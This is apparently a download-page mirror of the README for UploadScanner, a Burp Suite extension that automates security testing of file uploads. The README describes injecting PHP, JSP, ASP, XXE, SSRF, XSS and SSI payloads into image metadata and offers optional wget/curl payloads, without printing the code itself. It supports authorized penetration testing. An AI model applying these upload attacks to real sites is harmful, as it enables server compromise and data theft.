# UploadScanner Burp extension
A Burp Suite Pro extension to do security tests for HTTP file uploads.
**Table of Contents**
<!-- Table of contents generated generated by http://tableofcontent.eu -->
- [Abstract](#abstract)
- [Main feature](#main-feature)
- [Installation](#installation)
- [Tutorials](#tutorials)
- [About](#about)
- [Background information and FAQ](#background-information-and-faq)
- [TL;DR and important infos](#tldr-and-important-infos)
- [Basics](#basics)
- [Checklist](#checklist)
- [I broke the website, omg, what did I do?](#i-broke-the-website-omg-what-did-i-do)
- [Limitations](#limitations)
- [Detecting issues](#detecting-issues)
- [Detecting successful uploads](#detecting-successful-uploads)
- [FlexiInjector - Detecting requests with uploads](#flexiinjector-detecting-requests-with-uploads)
- [Image Formating options](#image-formating-options)
- [ReDownloader](#redownloader)
- [Testing and trophy case](#testing-and-trophy-case)
- [Explanation for UI configuration options](#explanation-for-ui-configuration-options)
- [Modules](#modules)
- [Active Scan module](#active-scan-module)
- [Imagetragick module](#imagetragick-module)
- [Imagemagick/Graphicsmagick module](#imagemagickgraphicsmagick-module)
- [Ghostscript module](#ghostscript-module)
- [LibAvFormat module](#libavformat-module)
- [PHP code module](#php-code-module)
- [JSP code module](#jsp-code-module)
- [ASP code module](#asp-code-module)
- [.htaccess/web.config module](#htaccesswebconfig-module)
- [CGI module](#cgi-module)
- [Server Side Include (SSI) module](#server-side-include-ssi-module)
- [XXE module](#xxe-module)
- [XSS module](#xss-module)
- [Eicar module](#eicar-module)
- [PDF module](#pdf-module)
- [Other SSRF module](#other-ssrf-module)
- [CSV/spreadsheet module](#csvspreadsheet-module)
- [Path traversal module](#path-traversal-module)
- [Polyglot module](#polyglot-module)
- [Fingerping module](#fingerping-module)
- [Quirks module](#quirks-module)
- [Generic URL replacer module](#generic-url-replacer-module)
- [Recursive uploader module](#recursive-uploader-module)
- [Fuzzer module](#fuzzer-module)
- [Timeout and DoS module](#timeout-and-dos-module)
- [File formats](#file-formats)
- [General options](#general-options)
- [Delete project settings on reload](#delete-project-settings-on-reload)
- [Name of exiftool executable](#name-of-exiftool-executable)
- [Throttle between requests in seconds](#throttle-between-requests-in-seconds)
- [Sleep time for sleep payloads in seconds](#sleep-time-for-sleep-payloads-in-seconds)
- [Create log (see "Done uploads" tab)](#create-log-see-done-uploads-tab)
- [Replace filename in requests](#replace-filename-in-requests)
- [Replace content type in requests](#replace-content-type-in-requests)
- [Replace file size in requests](#replace-file-size-in-requests)
- [Enable wget/curl/rundll payloads (default: only nslookup)](#enable-wgetcurlrundll-payloads-default-only-nslookup)
- [FlexiInjector options](#flexiinjector-options)
- [Choose file you uploaded](#choose-file-you-uploaded)
- [Mime type of that file](#mime-type-of-that-file)
- [Image formating options](#image-formating-options)
- [ReDownloader parsing options](#redownloader-parsing-options)
- [Parse other response (preflight request)](#parse-other-response-preflight-request)
- [1. Start marker to parse URL from response](#1-start-marker-to-parse-url-from-response)
- [1. End marker to parse URL from response](#1-end-marker-to-parse-url-from-response)
- [Replace \/ with / in parsed content](#replace-with-in-parsed-content)
- [Additional URL prefix for parsed part](#additional-url-prefix-for-parsed-part)
- [Additional URL suffix for parsed part](#additional-url-suffix-for-parsed-part)
- [2. Alternatively, a static URL](#2-alternatively-a-static-url)
- [Recursive uploader module options](#recursive-uploader-module-options)
- [Fuzzer module options](#fuzzer-module-options)
## Abstract
Testing web applications is a standard task for every security analyst. Various automated and semi-automated security testing tools exist to simplify the task. HTTP based file uploads are one specialised use case. However, most automated web application security scanners are not adapting their attacks when encountering file uploads and are therefore likely to miss vulnerabilities related to file upload functionalities.
While a lot of techniques used for file upload testing are documented throughout the web, the code necessary to automate such attacks is often missing. In other cases, the techniques only apply to very specific use cases. One of the goals of this research was to generalise and automate these attacks. The attack techniques include generic attacks such as Cross Site Scripting (XSS), External Entity Injection (XXE) and PHP/JSP/ASP code injection, but the goal is to execute these attacks customised for the use case of HTTP based file uploads. Additionally, more specific attacks on server side parsers are used as an attack vector, for example Server Side Request Forgery (SSRF) through m3u8 playlist file formats being parsed with LibAv.
File uploads on websites are an underestimated area for security testing. The attack surface on a server that parses files is automatically a lot bigger. While some of the issues that might occur get very high attention (eg. the [ImageTragick](https://imagetragick.com/) vulnerability), there are countless memory corruption bugs that get fixed every day in various parses that might also be in use on your webserver. And while your REST XML web service might not be vulnerable to XML External Entity (XXE) injection, it doesn't mean your image parser for JPEG XMP metadata (which is XML) has no XXE issue.
Various techniques are necessary to successfully upload a file, including correlation of file extensions, content types, and content. Moreover, the file content has to pass server-side checks or modifications such as image size requirements or resizing operations. Circumventing processing on the server side, creating content that survives the modification or creating content that results in the desired payload after the modification is another goal of this extension.
While there are already a couple of Burp extensions doing some checks, this extension tries to implements most attacks that seem feasible for file uploads. The extension is testing various attacks and is divided into modules. Each module handles several attacks of the same category.
## Main feature
While the extension has various interesting features in its various modules, one of the main features is:
1. Taking a small gif, png, jpeg, tiff, pdf, zip and mp4 file
2. If it’s an image, resize the image (sizes are UI options)
3. If it’s an image, give it a random new color
4. If the file format supports it, use the exiftool file format meta data techniques "keywords", "comment", "iptc:keywords", "xmp:keywords", "exif:ImageDescription" and "ThumbnailImage" ...
5. ... to inject PHP, JSP, ASP, XXE, SSRF, XXS and SSI payloads ...
6. ... then upload with various combinations of file extensions and content-types ...
7. ... to detect issues via sleep based payloads, Burp Collaborator interactions or by downloading the file again
## Installation
[UploadScanner.py](UploadScanner.py) is the file you need to import into Burp, see [Portswigger's support page on how to install an extension](https://support.portswigger.net/customer/portal/articles/1965930-how-to-install-an-extension-in-burp-suite).
After installing the extension, check the "Global & Active Scanning configuration" tab of the extension. If a field is marked red, there is an error.
## Tutorials
There are several tutorial videos available for the different topics that will help you get started. The UI of the extension changed a little since
没有合适的资源?快使用搜索试试~ 我知道了~
mod0BurpUploadScanner:用于Burp代理的HTTP文件上传扫描器
共220个文件
pm:193个
pl:15个
pod:4个
需积分: 50 4 下载量 62 浏览量
2021-02-05
16:58:14
上传
评论
收藏 8.98MB ZIP 举报
温馨提示
UploadScanner Burp扩展名 Burp Suite Pro扩展,可对HTTP文件上传进行安全性测试。 目录 抽象 测试Web应用程序是每位安全分析师的一项标准任务。 存在各种自动化和半自动化的安全测试工具来简化任务。 基于HTTP的文件上传是一种特殊的用例。 但是,大多数自动化的Web应用程序安全扫描程序在遇到文件上传时都无法适应其攻击,因此很可能会丢失与文件上传功能相关的漏洞。 尽管在整个Web上记录了许多用于文件上传测试的技术,但是自动进行此类攻击所必需的代码却经常丢失。 在其他情况下,这些技术仅适用于非常特定的用例。 这项研究的目标之一是概括和自动化这些攻击。 攻击技术
资源详情
资源评论
资源推荐
收起资源包目录
mod0BurpUploadScanner:用于Burp代理的HTTP文件上传扫描器 (220个子文件)
BappManifest.bmf 346B
exiftool_win.exe 7.95MB
BappDescription.html 5KB
README.md 56KB
README.md 12KB
Writer.pl 282KB
exiftool.pl 275KB
WriteExif.pl 127KB
XMP2.pl 66KB
WriteXMP.pl 62KB
QuickTimeStream.pl 39KB
XMPStruct.pl 35KB
WriteIPTC.pl 30KB
WritePostScript.pl 29KB
WritePDF.pl 29KB
WriteCanonRaw.pl 24KB
Shift.pl 23KB
WritePNG.pl 16KB
WriteQuickTime.pl 15KB
WritePhotoshop.pl 11KB
TagLookup.pm 434KB
Sony.pm 399KB
Canon.pm 343KB
ExifTool.pm 339KB
QuickTime.pm 335KB
Nikon.pm 314KB
de.pm 292KB
NikonCustom.pm 279KB
MXF.pm 253KB
it.pm 245KB
DICOM.pm 245KB
MacChineseTW.pm 226KB
Exif.pm 223KB
Pentax.pm 218KB
JPEGDigest.pm 212KB
ja.pm 204KB
MacKorean.pm 168KB
fr.pm 159KB
XMP.pm 157KB
PLUS.pm 148KB
Olympus.pm 136KB
MacChineseCN.pm 126KB
MacRSymbol.pm 126KB
JIS.pm 125KB
MacJapanese.pm 122KB
es.pm 120KB
ShiftJIS.pm 116KB
BuildTagLookup.pm 113KB
fi.pm 108KB
Minolta.pm 105KB
MIE.pm 102KB
nl.pm 89KB
PDF.pm 89KB
GeoTiff.pm 87KB
Panasonic.pm 84KB
CanonCustom.pm 77KB
CanonVRD.pm 74KB
FlashPix.pm 71KB
Kodak.pm 69KB
MakerNotes.pm 67KB
ko.pm 66KB
Casio.pm 62KB
RIFF.pm 58KB
Geotag.pm 55KB
FLIR.pm 55KB
PNG.pm 54KB
ID3.pm 53KB
EXE.pm 49KB
Samsung.pm 48KB
cs.pm 46KB
pl.pm 45KB
Qualcomm.pm 43KB
Microsoft.pm 43KB
ICC_Profile.pm 43KB
FujiFilm.pm 42KB
en_gb.pm 40KB
H264.pm 39KB
IPTC.pm 38KB
ru.pm 38KB
en_ca.pm 38KB
Photoshop.pm 37KB
zh_cn.pm 37KB
Ricoh.pm 36KB
Matroska.pm 34KB
PICT.pm 33KB
TagInfoXML.pm 33KB
HtmlDump.pm 32KB
Jpeg2000.pm 31KB
DNG.pm 31KB
Sigma.pm 30KB
MWG.pm 30KB
ASF.pm 30KB
CanonRaw.pm 30KB
M2TS.pm 29KB
NikonCapture.pm 28KB
Flash.pm 28KB
Font.pm 27KB
Real.pm 27KB
zh_tw.pm 27KB
PostScript.pm 26KB
共 220 条
- 1
- 2
- 3
易洪艳
- 粉丝: 32
- 资源: 4503
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 前端开发-什么是前端开发-关于前端开发的一些相关介绍
- Sora AI-关于文生视频的使用场景说明
- suno AI文生视频的相关教程和介绍使用
- 什么是后端开发-关于后端开发的一些小介绍分享
- Jurassic Pack Vol. II Dinosaurs 侏罗纪包卷恐龙二号Unity游戏模型资源unitypackage
- Jurassic Pack Vol. III Dinosaurs 侏罗纪包卷恐龙三号Unity游戏模型资源unitypackag
- Ultimate Seating Controller 终极座椅控制器Unity游戏开发插件资源unitypackage
- 什么是人工智能-关于人工智能的相关介绍说明
- Figma Converter for Unity适用Unity的Figma转换器Unity游戏开发插件unitypackage
- Creepy Animatronic Anims 令人毛骨悚然的电子动画Unity游戏动画插件资源unitypackage
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0